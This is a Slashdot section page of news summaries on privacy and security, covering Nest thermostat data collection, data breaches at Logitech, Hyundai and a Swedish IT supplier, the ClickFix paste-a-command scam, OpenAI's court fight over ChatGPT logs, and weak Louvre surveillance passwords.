Google

Google Is Collecting Troves of Data From Downgraded Nest Thermostats 11

Even after disabling remote control and officially ending support for early Nest Learning Thermostats, Google is still receiving detailed sensor and activity data from these devices, including temperature changes, motion, and ambient light. The Verge reports: After digging into the backend, security researcher Cody Kociemba found that the first- and second-generation Nest Learning Thermostats are still sending Google information about manual temperature changes, whether a person is present in the room, if sunlight is hitting the device, and more. Kociemba made the discovery while participating in a bounty program created by FULU, a right-to-repair advocacy organization cofounded by electronics repair technician and YouTuber Louis Rossmann.

FULU challenged developers to come up with a solution to restore smart functionality to Nest devices no longer supported by Google, and that's exactly what Kociemba did with his open-source No Longer Evil project. But after cloning Google's API to create this custom software, he started receiving a trove of logs from customer devices, which he turned off. "On these devices, while they [Google] turned off access to remotely control them, they did leave in the ability for the devices to upload logs. And the logs are pretty extensive," Kociemba tells The Verge. [...] "I was under the impression that the Google connection would be severed along with the remote functionality, however that connection is not severed, and instead is a one-way street," Kociemba says.
The Courts

NetChoice Sues Virginia To Block Its One-Hour Social Media Limit For Kids (theverge.com) 30

NetChoice is suing Virginia to block a new law that limits kids under 16 to one hour of daily social media use unless parents approve more time, arguing the rule violates the First Amendment and introduces serious privacy risks through mandatory age-verification. The Verge reports: In addition to restricting access to legal speech, NetChoice alleges that Virginia's incoming law (SB 854) will require platforms to verify user ages in ways that would pose privacy and security risks. The law requires platforms to use "commercially reasonable methods," which it says include a screen that prompts the user to enter a birth date. However, NetChoice argues that Virginia could go beyond this requirement, citing a post from Governor Youngkin on X, stating "platforms must verify age," potentially referring to stricter methods, like having users submit a government ID or other personal information.

NetChoice, which is backed by tech giants like Meta, Google, Amazon, Reddit, and Discord, alleges that the law puts a burden on minors' ability to engage or consume speech online. "The First Amendment prohibits the government from placing these types of restrictions on accessing lawful and valuable speech, just in the same way that the government can't tell you how long you could spend reading a book, watching a television program, or consuming a documentary," Paul Taske, the co-director of the Netchoice Litigation Center, tells The Verge.

"Virginia must leave the parenting decisions where they belong: with parents," Taske says. "By asserting that authority for itself, Virginia not only violates its citizens' rights to free speech but also exposes them to increased risk of privacy and security breaches."

AI

Could Firefox Be the Browser That Protects the Privacy of AI Users? (anildash.com) 54

Tech entrepreneur/blogger Anil Dash has been critical of AI browsers like ChatGPT Atlas. (He's written that Atlas "substitutes its own AI-generated content for the web, but it looks like it's showing you the web," while its prompt-based/command-line interface resembles a clunky text adventure, and it's true purpose seems to be ingesting more training data.)

And at the Mozilla Festival in Spain, "Virtually everyone shared some version of what I'd articulated as the majority view on AI, which is approximately that LLMs can be interesting as a technology, but that Big Tech, and especially Big AI, are decidedly awful and people are very motivated to stop them from committing their worst harms upon the vulnerable."

But... Another reality that people were a little more quiet in acknowledging, and sometimes reluctant to engage with out loud, is the reality that hundreds of millions of people are using the major AI tools every day... I don't know why today's Firefox users, even if they're the most rabid anti-AI zealots in the world, don't say, "well, even if I hate AI, I want to make sure Firefox is good at protecting the privacy of AI users so I can recommend it to my friends and family who use AI"...

My personal wishlist would be pretty simple:

* Just give people the "shut off all AI features" button. It's a tiny percentage of people who want it, but they're never going to shut up about it, and they're convinced they're the whole world and they can't distinguish between being mad at big companies and being mad at a technology so give them a toggle switch and write up a blog post explaining how extraordinarily expensive it is to maintain a configuration option over the lifespan of a global product.

* Market Firefox as "The best AI browser for people who hate Big AI". Regular users have no idea how creepy the Big AI companies are — they've just heard their local news talk about how AI is the inevitable future. If Mozilla can warn me how to protect my privacy from ChatGPT, then it can also mention that ChatGPT tells children how to self-harm, and should be aggressive in engaging with the community on how to build tools that help mitigate those kinds of harms — how do we catalyze that innovation?

* Remind people that there isn't "a Firefox" — everyone is Firefox. Whether it's Zen, or your custom build of Firefox with your favorite extensions and skins, it's all part of the same story. Got a local LLM that runs entirely as a Firefox extension? Great! That should be one of the many Firefoxes, too. Right now, so much of the drama and heightened emotions and tension are coming from people's (well... dudes') egos about there being One True Firefox, and wanting to be the one who controls what's in that version, as an expression of one set of values. This isn't some blood-feud fork, there can just be a lot of different choices for different situations. Make it all work.

Privacy

Logitech Reports Data Breach From Zero-Day Software Vulnerability (nerds.xyz) 5

BrianFagioli writes: Logitech has confirmed a cybersecurity breach after an intruder exploited a zero-day in a third-party software platform and copied internal data. The company says the incident did not affect its products, manufacturing or business operations, and it does not believe sensitive personal information like national ID numbers or credit card data were stored in the impacted system. The attacker still managed to pull limited information tied to employees, consumers, customers and suppliers, raising fair questions about how long the zero-day existed before being patched.

Logitech brought in outside cybersecurity firms, notified regulators and says the incident will not materially affect its financial results. The company expects its cybersecurity insurance policy to cover investigation costs and any potential legal or regulatory issues. Still, with zero-day attacks increasing across the tech world, even established hardware brands are being forced to acknowledge uncomfortable weaknesses in their internal systems.

Privacy

Hyundai Data Breach May Have Leaked Drivers' Personal Information (caranddriver.com) 54

According to Car and Driver, Hyundai has suffered a data breach that leaked the personal data of up to 2.7 million customers. The leak reportedly took place in February from Hyundai AutoEver, the company's IT affiliate. It includes customer names, driver's license numbers, and social security numbers. Longtime Slashdot reader sinij writes: Thanks to tracking modules plaguing most modern cars, that data likely includes the times and locations of customers' vehicles. These repeated breaches make it clear that, unlike smartphone manufacturers that are inherently tech companies, car manufacturers collecting your data are going to keep getting breached and leaking it.
Privacy

Proton Might Recycle Abandoned Email Addresses (nerds.xyz) 30

BrianFagioli writes: Popular privacy firm Proton is floating a plan on Reddit that should unsettle anyone who values privacy, writes Nerds.xyz. The company is considering recycling abandoned email addresses that were originally created by bots a decade ago. These addresses were never used, yet many of them are extremely common names that have silently collected misdirected emails, password reset attempts, and even entries in breach datasets. Handing those addresses to new owners today would mean that sensitive messages intended for completely different people could start landing in a stranger's inbox overnight.

Proton says it's just gathering feedback, but the fact that this made it far enough to ask the community is troubling. Releasing these long-abandoned addresses would create confusion, risk exposure of personal data, and undermine the trust users place in a privacy focused provider. It's hard to see how Proton could justify taking a gamble with other people's digital identities like this.

The Courts

OpenAI Fights Order To Turn Over Millions of ChatGPT Conversations (reuters.com) 69

An anonymous reader quotes a report from Reuters: OpenAI asked a federal judge in New York on Wednesday to reverse an order that required it to turn over 20 million anonymized ChatGPT chat logs amid a copyright infringement lawsuit by the New York Times and other news outlets, saying it would expose users' private conversations. The artificial intelligence company argued that turning over the logs would disclose confidential user information and that "99.99%" of the transcripts have nothing to do with the copyright infringement allegations in the case.

"To be clear: anyone in the world who has used ChatGPT in the past three years must now face the possibility that their personal conversations will be handed over to The Times to sift through at will in a speculative fishing expedition," the company said in a court filing (PDF). The news outlets argued that the logs were necessary to determine whether ChatGPT reproduced their copyrighted content and to rebut OpenAI's assertion that they "hacked" the chatbot's responses to manufacture evidence. The lawsuit claims OpenAI misused their articles to train ChatGPT to respond to user prompts.

Magistrate Judge Ona Wang said in her order to produce the chats that users' privacy would be protected by the company's "exhaustive de-identification" and other safeguards. OpenAI has a Friday deadline to produce the transcripts.

Google

Google Is Introducing Its Own Version of Apple's Private AI Cloud Compute 23

Google has unveiled Private AI Compute, a cloud platform designed to deliver advanced AI capabilities while preserving user privacy. As The Verge notes, the feature is "virtually identical to Apple's Private Cloud Compute." From the report: Many Google products run AI features like translation, audio summaries, and chatbot assistants, on-device, meaning data doesn't leave your phone, Chromebook, or whatever it is you're using. This isn't sustainable, Google says, as advancing AI tools need more reasoning and computational power than devices can supply. The compromise is to ship more difficult AI requests to a cloud platform, called Private AI Compute, which it describes as a "secure, fortified space" offering the same degree of security you'd expect from on-device processing. Sensitive data is available "only to you and no one else, not even Google."
Security

ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of (arstechnica.com) 79

An anonymous reader quotes a report from Ars Technica: ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.
Researchers from CrowdStrike described in a report a campaign designed to infect Macs with a Mach-O executive. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."

Push Security, meanwhile, reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.
Firefox

Firefox 145 Drops Support For 32-bit Linux (nerds.xyz) 28

BrianFagioli writes: Mozilla has released Firefox 145.0, and the standout change in this version is the official end of support for 32-bit Linux systems. Users on 32-bit distributions will no longer receive updates and are being encouraged to switch to the 64-bit build to continue getting security patches and new features. While most major Linux distributions have already moved past 32-bit support, this shift will still impact older hardware users and lightweight community projects that have held on to 32-bit for the sake of performance or preservation.

The rest of the update introduces features such as built-in PDF comments, improved fingerprinting resistance for private browsing, tab group previews, password management in the sidebar, and minor UI refinements. Firefox also now compresses local translation models with Zstandard to reduce storage needs. But the end of 32-bit Linux support is the change that will leave the biggest mark, signaling another step toward a web ecosystem firmly centered on 64-bit computing.

Security

A Jailed Hacking Kingpin Reveals All About Cybercrime Gang (bbc.com) 19

Slashdot reader alternative_right shares an exclusive BBC interview with Vyacheslav "Tank" Penchukov, once a top-tier cyber-crime boss behind Jabber Zeus, IcedID, and major ransomware campaigns. His story traces the evolution of modern cybercrime from early bank-theft malware to today's lucrative ransomware ecosystem, marked by shifting alliances, Russian security-service ties, and the paranoia that ultimately consumes career hackers. Here's an excerpt from the report: In the late 2000s, he and the infamous Jabber Zeus crew used revolutionary cyber-crime tech to steal directly from the bank accounts of small businesses, local authorities and even charities. Victims saw their savings wiped out and balance sheets upended. In the UK alone, there were more than 600 victims, who lost more than $5.2 million in just three months. Between 2018 and 2022, Penchukov set his sights higher, joining the thriving ransomware ecosystem with gangs that targeted international corporations and even a hospital. [...]

Penchukov says he did not think about the victims, and he does not seem to do so much now, either. The only sign of remorse in our conversation was when he talked about a ransomware attack on a disabled children's charity. His only real regret seems to be that he became too trusting with his fellow hackers, which ultimately led to him and many other criminals being caught. "You can't make friends in cyber-crime, because the next day, your friends will be arrested and they will become an informant," he says. "Paranoia is a constant friend of hackers," he says. But success leads to mistakes. "If you do cyber-crime long enough you lose your edge," he says, wistfully.

EU

Critics Call Proposed Changes To Landmark EU Privacy Law 'Death By a Thousand Cuts' (reuters.com) 27

An anonymous reader quotes a report from Reuters: Privacy activists say proposed changes to Europe's landmark privacy law, including making it easier for Big Tech to harvest Europeans' personal data for AI training, would flout EU case law and gut the legislation. The changes proposed by the European Commission are part of a drive to simplify a slew of laws adopted in recent years on technology, environmental and financial issues which have in turn faced pushback from companies and the U.S. government.

EU antitrust chief Henna Virkkunen will present the Digital Omnibus, in effect proposals to cut red tape and overlapping legislation such as the General Data Protection Regulation, the Artificial Intelligence Act, the e-Privacy Directive and the Data Act, on November 19. According to the plans, Google, Meta Platforms, OpenAI and other tech companies may be allowed to use Europeans' personal data to train their AI models based on legitimate interest.

In addition, companies may be exempted from the ban on processing special categories of personal data "in order not to disproportionately hinder the development and operation of AI and taking into account the capabilities of the controller to identify and remove special categories of personal data." [...] The proposals would need to be thrashed out with EU countries and European Parliament in the coming months before they can be implemented.
"The draft Digital Omnibus proposes countless changes to many different articles of the GDPR. In combination this amounts to a death by a thousand cuts," Austrian privacy group noyb said in a statement. "This would be a massive downgrading of Europeans' privacy 10 years after the GDPR was adopted," noyb's Max Schrems said.

"These proposals would change how the EU protects what happens inside your phone, computer and connected devices," European Digital Rights policy advisor Itxaso Dominguez de Olazabal wrote in a LinkedIn post. "That means access to your device could rely on legitimate interest or broad exemptions like security, fraud detection or audience measurement," she said.
Google

Did ChatGPT Conversations Leak... Into Google Search Console Results? (arstechnica.com) 51

"For months, extremely personal and sensitive ChatGPT conversations have been leaking into an unexpected destination," reports Ars Technica: the search-traffic tool for webmasters , Google Search Console.

Though it normally shows the short phrases or keywords typed into Google which led someone to their site, "starting this September, odd queries, sometimes more than 300 characters long, could also be found" in Google Search Console. And the chats "appeared to be from unwitting people prompting a chatbot to help solve relationship or business problems, who likely expected those conversations would remain private." Jason Packer, owner of analytics consulting firm Quantable, flagged the issue in a detailed blog post last month, telling Ars Technica he'd seen 200 odd queries — including "some pretty crazy ones." (Web optimization consultant Slobodan ManiÄ helped Packer investigate...) Packer points out "nobody clicked share" or were given an option to prevent their chats from being exposed. Packer suspected that these queries were connected to reporting from The Information in August that cited sources claiming OpenAI was scraping Google search results to power ChatGPT responses. Sources claimed that OpenAI was leaning on Google to answer prompts to ChatGPT seeking information about current events, like news or sports... "Did OpenAI go so fast that they didn't consider the privacy implications of this, or did they just not care?" Packer posited in his blog... Clearly some of those searches relied on Google, Packer's blog said, mistakenly sending to GSC "whatever" the user says in the prompt box... This means "that OpenAI is sharing any prompt that requires a Google Search with both Google and whoever is doing their scraping," Packer alleged. "And then also with whoever's site shows up in the search results! Yikes."

To Packer, it appeared that "ALL ChatGPT prompts" that used Google Search risked being leaked during the past two months. OpenAI claimed only a small number of queries were leaked but declined to provide a more precise estimate. So, it remains unclear how many of the 700 million people who use ChatGPT each week had prompts routed to Google Search Console.

"Perhaps most troubling to some users — whose identities are not linked in chats unless their prompts perhaps share identifying information — there does not seem to be any way to remove the leaked chats from Google Search Console.."
AI

Common Crawl Criticized for 'Quietly Funneling Paywalled Articles to AI Developers' (msn.com) 42

For more than a decade, the nonprofit Common Crawl "has been scraping billions of webpages to build a massive archive of the internet," notes the Atlantic, making it freely available for research. "In recent years, however, this archive has been put to a controversial purpose: AI companies including OpenAI, Google, Anthropic, Nvidia, Meta, and Amazon have used it to train large language models.

"In the process, my reporting has found, Common Crawl has opened a back door for AI companies to train their models with paywalled articles from major news websites. And the foundation appears to be lying to publishers about this — as well as masking the actual contents of its archives..." Common Crawl's website states that it scrapes the internet for "freely available content" without "going behind any 'paywalls.'" Yet the organization has taken articles from major news websites that people normally have to pay for — allowing AI companies to train their LLMs on high-quality journalism for free. Meanwhile, Common Crawl's executive director, Rich Skrenta, has publicly made the case that AI models should be able to access anything on the internet. "The robots are people too," he told me, and should therefore be allowed to "read the books" for free. Multiple news publishers have requested that Common Crawl remove their articles to prevent exactly this use. Common Crawl says it complies with these requests. But my research shows that it does not.

I've discovered that pages downloaded by Common Crawl have appeared in the training data of thousands of AI models. As Stefan Baack, a researcher formerly at Mozilla, has written, "Generative AI in its current form would probably not be possible without Common Crawl." In 2020, OpenAI used Common Crawl's archives to train GPT-3. OpenAI claimed that the program could generate "news articles which human evaluators have difficulty distinguishing from articles written by humans," and in 2022, an iteration on that model, GPT-3.5, became the basis for ChatGPT, kicking off the ongoing generative-AI boom. Many different AI companies are now using publishers' articles to train models that summarize and paraphrase the news, and are deploying those models in ways that steal readers from writers and publishers.

Common Crawl maintains that it is doing nothing wrong. I spoke with Skrenta twice while reporting this story. During the second conversation, I asked him about the foundation archiving news articles even after publishers have asked it to stop. Skrenta told me that these publishers are making a mistake by excluding themselves from "Search 2.0" — referring to the generative-AI products now widely being used to find information online — and said that, anyway, it is the publishers that made their work available in the first place. "You shouldn't have put your content on the internet if you didn't want it to be on the internet," he said. Common Crawl doesn't log in to the websites it scrapes, but its scraper is immune to some of the paywall mechanisms used by news publishers. For example, on many news websites, you can briefly see the full text of any article before your web browser executes the paywall code that checks whether you're a subscriber and hides the content if you're not. Common Crawl's scraper never executes that code, so it gets the full articles.

Thus, by my estimate, the foundation's archives contain millions of articles from news organizations around the world, including The Economist, the Los Angeles Times, The Wall Street Journal, The New York Times, The New Yorker, Harper's, and The Atlantic.... A search for nytimes.com in any crawl from 2013 through 2022 shows a "no captures" result, when in fact there are articles from NYTimes.com in most of these crawls.

"In the past year, Common Crawl's CCBot has become the scraper most widely blocked by the top 1,000 websites," the article points out...
Privacy

Unesco Adopts Global Standards On 'Wild West' Field of Neurotechnology (theguardian.com) 14

Unesco has adopted the first global ethical standards for neurotechnology, defining "neural data" and outlining more than 100 recommendations aimed at safeguarding mental privacy. "There is no control," said Unesco's chief of bioethics, Dafna Feinholz. "We have to inform the people about the risks, the potential benefits, the alternatives, so that people have the possibility to say 'I accept, or I don't accept.'" The Guardian reports: She said the new standards were driven by two recent developments in neurotechnology: artificial intelligence (AI), which offers vast possibilities in decoding brain data, and the proliferation of consumer-grade neurotech devices such as earbuds that claim to read brain activity and glasses that track eye movements.

The standards define a new category of data, "neural data," and suggest guidelines governing its protection. A list of more than 100 recommendations ranges from rights-based concerns to addressing scenarios that are -- at least for now -- science fiction, such as companies using neurotechnology to subliminally market to people during their dreams.
"Neurotechnology has the potential to define the next frontier of human progress, but it is not without risks," said Unesco's director general, Audrey Azoulay. The new standards would "enshrine the inviolability of the human mind," she said.
Android

Gemini Starts Rolling Out On Android Auto 7

Gemini is (finally) rolling out on Android Auto, replacing Google Assistant while keeping "Hey Google," adding Gemini Live ("let's talk live"), message auto-translation, and new privacy toggles. "One feature lost between Assistant and Gemini, though, is the ability to use nicknames for contacts," notes 9to5Google. From the report: Over the past 24 hours, Google has quietly started the rollout of Gemini for Android Auto, seemingly starting with beta users. The change is server-side, with multiple users reporting that Gemini has gone live in the car. One user mentions that they noticed this on Android Auto 15.6, and we're seeing the same on our Pixel 10 Pro XL connected to different car displays, and also on a Galaxy Z Fold 7 running Android Auto 15.7.

It's unclear if this particular version is what delivers support, but that seems unlikely seeing as this very started rolling out last week. Android Auto 15.6 and 15.7 are currently only available in beta, so it's also unclear at this time if the rollout is tied to the Android Auto beta or simply showing up on that version as a coincidence.
Security

US Congressional Budget Office Hit By Suspected Foreign Cyberattack (bleepingcomputer.com) 26

An anonymous reader quotes a report from BleepingComputer: The U.S. Congressional Budget Office (CBO) confirms it suffered a cybersecurity incident after a suspected foreign hacker breached its network, potentially exposing sensitive data. In a statement shared with BleepingComputer, CBO spokesperson Caitlin Emma confirmed the "security incident" and said the agency acted quickly to contain it. "The Congressional Budget Office has identified the security incident, has taken immediate action to contain it, and has implemented additional monitoring and new security controls to further protect the agency's systems going forward," Emma told BleepingComputer.

"The incident is being investigated and work for the Congress continues. Like other government agencies and private sector entities, CBO occasionally faces threats to its network and continually monitors to address those threats." The Washington Post first reported the breach, stating that officials discovered the hack in recent days and are now concerned that emails and exchanges between congressional offices and the CBO's analysts may have been exposed. While officials have reported told lawmakers they believe the intrusion was detected early, some congressional office have allegedly halted emails with the CBO out of security concerns.

Privacy

The Louvre's Video Surveillance Password Was 'Louvre' (pcgamer.com) 90

A bungled October 18 heist that saw $102 million of crown jewels stolen from the Louvre in broad daylight has exposed years of lax security at the national art museum. From trivial passwords like 'LOUVRE' to decades-old, unsupported systems and easy rooftop access, the job was made surprisingly easy. PC Gamer reports: As Rogue cofounder and former Polygon arch-jester Cass Marshall notes on Bluesky, we owe a lot of videogame designers an apology. We've spent years dunking on the emptyheadedness of game characters leaving their crucial security codes and vault combinations in the open for anyone to read, all while the Louvre has been using the password "Louvre" for its video surveillance servers. That's not an exaggeration. Confidential documents reviewed by Liberation detail a long history of Louvre security vulnerabilities, dating back to a 2014 cybersecurity audit performed by the French Cybersecurity Agency (ANSSI) at the museum's request. ANSSI experts were able to infiltrate the Louvre's security network to manipulate video surveillance and modify badge access.

"How did the experts manage to infiltrate the network? Primarily due to the weakness of certain passwords which the French National Cybersecurity Agency (ANSSI) politely describes as 'trivial,'" writes Liberation's Brice Le Borgne via machine translation. "Type 'LOUVRE' to access a server managing the museum's video surveillance, or 'THALES' to access one of the software programs published by... Thales." The museum sought another audit from France's National Institute for Advanced Studies in Security and Justice in 2015. Concluded two years later, the audit's 40 pages of recommendations described "serious shortcomings," "poorly managed" visitor flow, rooftops that are easily accessible during construction work, and outdated and malfunctioning security systems. Later documents indicate that, in 2025, the Louvre was still using security software purchased in 2003 that is no longer supported by its developer, running on hardware using Windows Server 2003.

Privacy

Data Breach At Major Swedish Software Supplier Impacts 1.5 Million (bleepingcomputer.com) 6

A massive cyberattack on Swedish IT supplier Miljodata exposed personal data from up to 1.5 million citizens, prompting a national privacy investigation and scrutiny into security failures across multiple municipalities. BleepingComputer reports: MiljÃdata is an IT systems supplier for roughly 80% of Sweden's municipalities. The company disclosed the incident on August 25, saying that the attackers stole data and demanded 1.5 Bitcoin to not leak it. The attack caused operational disruptions that affected citizens in multiple regions in the country, including Halland, Gotland, Skelleftea, Kalmar, Karlstad, and Monsteras.

Because of the large impact, the state monitored the situation from the time of disclosure, with CERT-SE and the police starting to investigate immediately. According to IMY, the attacker exposed on the dark web data that corresponds to 1.5 million people in the country, creating the basis for investigating potential General Data Protection Regulation (GDPR) violations. [...] Although no ransomware groups had claimed the attack when Miljodata disclosed the incident, BleepingComputer found that the threat group Datacarry posted the stolen data on its dark web portal on September 13.
The leaked database has been added to Have I Been Pwned, which contains information such as names, email addresses, physical addresses, phone numbers, government IDs, and dates of birth.
Businesses

Amazon Accuses Perplexity of Computer Fraud, Demands It Stop AI Agent From Buying On Its Site (bloomberg.com) 44

Amazon has sent a cease-and-desist letter to Perplexity AI demanding that the AI search startup stop allowing its AI browser agent, Comet, to make purchases online for users. From a report: The e-commerce giant is accusing Perplexity of committing computer fraud by failing to disclose when its AI agent is shopping on a user's behalf, in violation of Amazon's terms of service, according to people familiar with the letter sent on Friday. The document also said Perplexity's tool degraded the Amazon shopping experience and introduced privacy vulnerabilities, said the people, who spoke on condition of anonymity to discuss internal matters.

In response, Perplexity said Amazon is bullying a smaller competitor with a rival AI agent shopping product. The clash between Amazon and Perplexity offers an early glimpse into a looming debate over how to handle the proliferation of so-called AI agents that field more complex tasks online for users, including shopping. Like OpenAI and Alphabet's Google, Perplexity has pushed to rethink the traditional web browser around AI, with the goal of having it streamline more actions for users, such as drafting emails and conducting research.

Slashdot Top Deals